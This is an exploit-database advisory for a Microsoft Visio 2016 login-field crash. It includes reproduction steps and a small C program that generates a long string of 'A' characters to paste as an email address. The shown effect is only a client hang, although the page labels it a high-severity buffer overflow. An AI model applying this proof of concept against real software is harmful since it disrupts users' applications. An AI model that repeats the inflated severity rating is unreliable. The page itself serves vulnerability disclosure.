Microsoft Visio 2016 (16.0.4738.1000) 'Log in accounts' allows go on whit email formed by one thousand A in every of its parts AAA---A@AAA--A.AAA---A

vendor:

Visio 2016

by:

César Adrián Coronado Llanos

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Visio 2016

Affected Version From: 16.0.4738.1000

Affected Version To: 16.0.4738.1000

Patch Exists: NO

Related CWE: N/A

CPE: a:microsoft:visio:2016

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Microsoft Windows 10 Home Single Language x64

2019

Microsoft Visio 2016 (16.0.4738.1000) ‘Log in accounts’ allows go on whit email formed by one thousand A in every of its parts AAA—A@AAA–A.AAA—A

Microsoft Visio 2016 (16.0.4738.1000) is vulnerable to a buffer overflow attack when a user attempts to log in with an email address formed by one thousand A characters in each of its parts. This can be achieved by running the generator.c code, which creates a file called letters.txt containing one thousand A characters. The user then needs to copy the content of the file to the clipboard, open Visio 2016, click on 'Change account or Login', paste the clipboard, type @, paste the clipboard again, type ., paste the clipboard for the last time, click on 'Next' and then click on 'Professional account'. Visio 2016 will not respond and will remain in a white window without sending any message.

Mitigation:

Users should avoid using long email addresses when logging into Microsoft Visio 2016.

Source

Exploit-DB raw data:

# -⋆- coding: utf-8 -⋆-
Created on Thu Feb 21 01:32:50 2019

@author: César
"""

#Exploit Title: Microsoft Visio 2016 (16.0.4738.1000) "Log in accounts" allows go on whit email formed by one thousand A in every of its parts AAA---A@AAA--A.AAA---A 
#Descovered by: César Adrián Coronado Llanos
#Descovered Date; Sun Feb 17 20:34:23 2019
#Vendor Homepage: https://www.microsoft.com
#Tested Version: 16.0.4738.1000 x64
#Tested on OS: Microsoft Windows 10 Home Single Language x64
#Versión 		10.0.10240 compilación 10240

#Steps to produce the crash
#1.- Run c code: generator.c
#2.- Open the file created "letters.txt" and copy the text content to clipboard
#3.- Open Visio 2016
#4.- Click in change account or Login
#5.- In the Login paste the clipboard, typewrite @ paste again the clipboard, typewrite . and paste for last time the clipboard, clik in next
#6.- Click in professional account
#7.- Visio 2016 don't respond, however it stays in a white window and don't send us any message

Note: For do this you need internet conection.

#include<stdio.h>
int main(){
	int i;
	FILE *letters;
	if((letters = fopen("letters.txt","w+")) != NULL){
		for(i=0;i<999;i++){
			fprintf(letters,"A");
		}
	}
	fclose(letters);
	printf("\tThe file was created successfully!!\n");
}

Note: This code was compiled in dev C++